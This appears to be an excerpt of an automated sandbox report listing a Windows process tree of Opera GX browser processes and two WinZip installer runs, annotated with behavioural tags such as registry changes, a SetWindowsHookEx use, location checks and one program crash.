C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=10556,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5328 /prefetch:82⤵PID:4172
-
-
C:\Program Files\scoped_dir5888_359084944\winzip27-mf.exe"C:\Program Files\scoped_dir5888_359084944\winzip27-mf.exe"2⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\e5e7741\winzip27-mf.exerun=1 shortcut="C:\Program Files\scoped_dir5888_359084944\winzip27-mf.exe"3⤵PID:3908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 19044⤵
- Program crash
PID:7552
-
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=10140,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9176 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6020
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=166 --field-trial-handle=10036,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10380 /prefetch:12⤵PID:3720
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9368,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10696 /prefetch:82⤵PID:6892
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9760,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10696 /prefetch:82⤵PID:1316
-
-
C:\Program Files\scoped_dir5888_816428675\winzip28-mf.exe"C:\Program Files\scoped_dir5888_816428675\winzip28-mf.exe"2⤵PID:6992
-
C:\Users\Admin\AppData\Local\Temp\e5e99fc\winzip28-mf.exerun=1 shortcut="C:\Program Files\scoped_dir5888_816428675\winzip28-mf.exe"3⤵PID:7572
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=169 --field-trial-handle=5324,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=520 /prefetch:12⤵PID:1880
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=170 --field-trial-handle=8748,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=536 /prefetch:12⤵PID:1304
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=171 --field-trial-handle=3144,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9944 /prefetch:12⤵PID:7480
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=172 --field-trial-handle=10160,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10080 /prefetch:22⤵PID:6732
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=173 --field-trial-handle=10196,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3132 /prefetch:12⤵PID:676
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=174 --field-trial-handle=5544,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6828 /prefetch:12⤵PID:1404
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=175 --field-trial-handle=10392,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9416 /prefetch:12⤵
- Checks computer location settings
PID:7572
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=176 --field-trial-handle=5408,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6320 /prefetch:12⤵PID:3340
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=177 --field-trial-handle=6336,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:12⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=178 --field-trial-handle=10712,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7012 /prefetch:12⤵PID:5968
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=179 --field-trial-handle=7820,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9796 /prefetch:12⤵
- Checks computer location settings
PID:6984
-
-
